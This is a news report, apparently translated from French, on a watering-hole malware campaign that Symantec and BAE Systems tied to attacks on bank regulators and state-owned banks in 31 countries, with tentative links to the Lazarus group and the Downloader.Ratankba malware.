Attackers have targeted bank regulators and state-owned banks in more than 30 countries, researchers from Symantec and BAE Systems said over the weekend, using a watering hole technique that redirects users to a site exploiting flaws in Silverlight and Flash Player.
The malware attacks that recently put Polish banks on alert were actually part of a wider campaign targeting financial organizations in more than 30 countries. Security researchers from Symantec and BAE Systems linked the malware to similar attacks that have taken place since October 2016 in other regions. There are also similarities to tools previously used by a group of attackers known in the security industry as Lazarus.
The attackers compromised websites that were of interest depending on their final target. This is the so-called “Watering Hole” technique. It involves creating a compromised site and luring victims to it. The code injected into the site redirects visitors to a specific exploit kit that contains programs that exploit flaws in Silverlight and Flash Player software. These only activate for visitors whose IP addresses meet certain criteria. “These IP addresses belong to 104 different organizations located in 31 countries,” Symantec researchers explain in a post posted on February 12. “The vast majority are banks, plus a few telecommunications and Internet players.”
In the case of the banking institutions targeted in Poland, it is suspected that the malicious code was hosted on the website of the Polish Financial Supervision Authority, the government regulator of the banking sector. BAE Systems researchers found evidence that similar code pointing to the specific exploit kit was on the website of the National Bank of Mexico in November, which is the Mexican equivalent of the Polish Financial Supervision Authority. The same code was also found on the website of Banco de la República Oriental del Uruguay, South America’s largest state-owned bank, according to BAE Systems. In the list of targeted IP addresses were those of 19 organizations located in Poland, 15 located in the United States, 9 in Mexico, 7 in the United Kingdom and 6 in Chile.
France is not among the countries listed by Symantec in its post (above).
A malware called Downloader.Ratankba
The program triggering the exploits is previously unknown malware that Symantec is now calling Downloader.Ratankba. It downloads another malicious program that can gather information about the compromised computer system. The code of this second tool has similarities with the malware previously used by the Lazarus group. The latter has been operating since 2009. It has often attacked targets in the United States and South Korea, recalls Symantec. The group is also suspected of involvement in the theft of $81 million from the Bangladesh central bank last year. In this attack, malware was used to manipulate the computers used by the bank to send transfer orders via the Swift interbank messaging network.
“The technical evidence for linking the Lazarus group…to ‘waterhole’ activity is unclear,” BAE Systems researchers note in a post published over the weekend. However, they add, the choice of banking regulators and state banks could be a clue, given that their previous robberies have targeted central banks, even that has not really helped to infiltrate the sector more widely. banking.